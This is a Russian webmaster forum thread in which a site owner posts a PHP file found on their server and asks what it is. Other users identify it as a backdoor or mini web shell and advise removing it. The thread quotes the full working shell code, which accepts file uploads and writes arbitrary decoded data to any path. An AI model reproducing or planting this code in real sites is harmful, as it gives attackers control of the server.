Форум Сайтостроение Веб-строительство

Код на сайте

12
tocell
На сайте с 26.05.2011
Offline
55
tocell
951

Обнаружил к корне сайта файлик с таким кодом:

<title>MCL</title><form enctype=multipart/form-data method=post><input name=xek type=file><input type=submit name=gogogo>

<br><br><input name=path type=text value=<?php echo @getcwd(); ?>/>

<? echo base64_decode("Y2hlY2tkYXRh"); if ((isset($_REQUEST[fname]))&&(isset($_REQUEST[fdata])))

{ $fp=fopen(base64_decode($_REQUEST[fname]), "wb"); $data=base64_decode($_REQUEST[fdata]); $length=strlen($data); fwrite($fp, $data, $length); fclose($fp); }

if(isset($_POST[gogogo])) { if(is_uploaded_file($_FILES[xek][tmp_name])) { @copy($_FILES[xek][tmp_name],$_FILES[xek][name]); }}; ?>

ЧТО ЭТО МОЖЕТ БЫТЬ?

подпись
Vladist
На сайте с 18.06.2011
Offline
100
Vladist
#1

Зашифрованная ссылка на какой-то сайт или сайты...

pavel419
На сайте с 03.05.2006
Offline
315
pavel419
#2

tocell, известно что, какая-нить вирусяка живет)

Айболит вам в помощь )

Тока будьте осторожны, не всё что он там найдет, это вирусы)))

---------- Добавлено 21.11.2013 в 01:15 ----------

А вобще я б выпилил эти сомнительные куски, если без них сайт пашет, значит всё ок)

@RuSeoBot (http://s419.ru/ruseobot/)- первый seo-бот в Twitter, а теперь - и канал в Telegram (http://s419.ru/servisy/pervyj-poiskovyj-seo-kanal-v-telegram/) Мой сайт про виртуальную реальность (http://vr419.ru/) Как правильно покупать на Алиэкспресс (http://4ali.ru/)
Plutishe
На сайте с 06.03.2006
Offline
205
Plutishe
#3
pavel419:
tocell, известно что, какая-нить вирусяка живет)
Айболит вам в помощь )
Тока будьте осторожны, не всё что он там найдет, это вирусы)))

---------- Добавлено 21.11.2013 в 01:15 ----------

А вобще я б выпилил эти сомнительные куски, если без них сайт пашет, значит всё ок)

Можно конечно и выпилить, но предварительно забэкапить файлик этот, т.к. в процессе эксплуатации сайта, могут вылезти баги. 🙅

Хостинг за РУБЛИ (http://yousite.ru/h) | VPS/VDS на платформе: XEN c администрированием (http://yousite.ru/v) | Регистрация доменов (http://yousite.ru/d)
pavel419
На сайте с 03.05.2006
Offline
315
pavel419
#4

Plutishe, ну да, тоже вариант, но они обычно сразу вылезают)

Например, когда народ пытается что-то спрятать в темах для вордпресса.

Сайт сразу падает.

ishipilov
На сайте с 25.12.2011
Offline
101
ishipilov
#5

Этот код представляет из себя форму и обработчик формы.

Теоретически с помощью этого обработчика можно залить к вам на сайт все что угодно.

Я думаю, это файлик лучше удалить)))

md5by
На сайте с 30.12.2011
Offline
68
md5by
#6
ishipilov:
Этот код представляет из себя форму и обработчик формы.
Теоретически с помощью этого обработчика можно залить к вам на сайт все что угодно.
Я думаю, это файлик лучше удалить)))

Бэкдорчик так называемый :) 🍿

elina732
На сайте с 26.04.2013
Offline
12
elina732
#7

Это надо полностью код весь смотреть, этот отрывок, собств-но, может быть и нужным для какого-нить модуля или компонента

tocell
На сайте с 26.05.2011
Offline
55
tocell
#8
elina732:
Это надо полностью код весь смотреть, этот отрывок, собств-но, может быть и нужным для какого-нить модуля или компонента

Это не кусок кода, это полностью файлик с таким названием shell5_php.txt

Vladist
На сайте с 18.06.2011
Offline
100
Vladist
#9
tocell:
Это не кусок кода, это полностью файлик с таким названием shell5_php.txt

Файл этот пробовали удалить? Сайт после удаления файла нормально работает?

K5
На сайте с 21.07.2010
Offline
209
kgtu5
#10

мини шелл

аська 45два48499два записки на работе (http://memoryhigh.ru) помогу с сайтом, удалю вирусы, настрою впс -> отзывы ТУТ (/ru/forum/836248) и ТАМ (http://www.maultalk.com/topic140187.html) !!!всегда проверяйте данные людей, которые сами пишут вам в аську или скайп!!!
12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий